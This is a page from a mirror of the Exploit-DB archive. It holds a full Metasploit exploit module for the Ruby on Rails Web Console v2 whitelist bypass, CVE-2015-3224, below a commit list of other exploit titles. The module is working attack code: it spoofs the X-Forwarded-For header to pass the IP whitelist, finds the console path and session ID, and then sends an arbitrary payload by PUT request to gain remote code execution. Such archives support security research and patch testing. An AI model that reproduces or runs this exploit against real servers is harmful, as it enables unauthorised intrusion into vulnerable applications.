bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/remote/41689.rb
Offensive Security 3ad96f313d DB: 2017-03-24 
39 new exploits

Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)
Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)
Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)
Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)
Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)
EMC Replication Manager < 5.3 - Command Execution (Metasploit)
MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)
Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)
CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)
Lenovo System Update - Privilege Escalation (Metasploit)
Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)
HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)
VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)
CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)
MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)

SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)
Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
ExaGrid - Known SSH Key and Default Password (Metasploit)
GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)
Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)
SSH - User Code Execution (Metasploit)
Redmine SCM Repository - Arbitrary Command Execution (Metasploit)

Linux/x86 - Bind Shell Shellcode (42 bytes)
Linux/x86 - Bind Shell Shellcode (44 bytes)
Joomla! Component Modern Booking 1.0 - 'coupon' Parameter SQL Injection
Flippa Clone - SQL Injection
Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)
D-Link/TRENDnet - NCC Service Command Injection (Metasploit)
Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)
WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)
WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)
Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)
2017-03-24 05:01:16 +00:00

107 lines
No EOL
3.6 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution',
'Description' => %q{
This module exploits an IP whitelist bypass vulnerability in the developer
web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also
achieve code execution on Rails 4.2.x if the attack is launched from a
whitelisted IP range.
},
'Author' => [
'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure
'Ben Murphy <benmmurphy@gmail.com>', # Discovery & disclosure
'hdm' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-3224' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2015/06/16/18' ],
[ 'URL', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ' ],
[ 'URL', 'https://hackerone.com/reports/44513' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PrependFork' => true },
'DisclosureDate' => 'Jun 16 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3000),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
], self.class)
end
#
# Identify the web console path and session ID, then inject code with it
#
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => '0000::1'
}
}, 25)
unless res
print_error("Error: No response requesting #{datastore['TARGETURI']}")
return
end
web_console_path = nil
# Support vulnerable Web Console versions
if res.body.to_s =~ /data-remote-path='([^']+)'/
web_console_path = "/" + $1
end
# Support newer Web Console versions
if web_console_path.nil? && res.body.to_s =~ /data-mount-point='([^']+)'/
web_console_mount = $1
unless res.body.to_s =~ /data-session-id='([^']+)'/
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
return
end
web_console_path = normalize_uri(web_console_mount, 'repl_sessions', $1)
end
unless web_console_path
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
print_error('Error: The web console is patched, disabled, or you are not in the whitelisted scope')
else
print_error("Error: No web console path found when requesting #{datastore['TARGETURI']}")
end
return
end
print_status("Sending payload to #{web_console_path}")
res = send_request_cgi({
'uri' => web_console_path,
'method' => 'PUT',
'headers' => {
'X-Forwarded-For' => '0000::1',
'Accept' => 'application/vnd.web-console.v2',
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'input' => payload.encoded
}
}, 25)
end
end
Reference in a new issue View git blame Copy permalink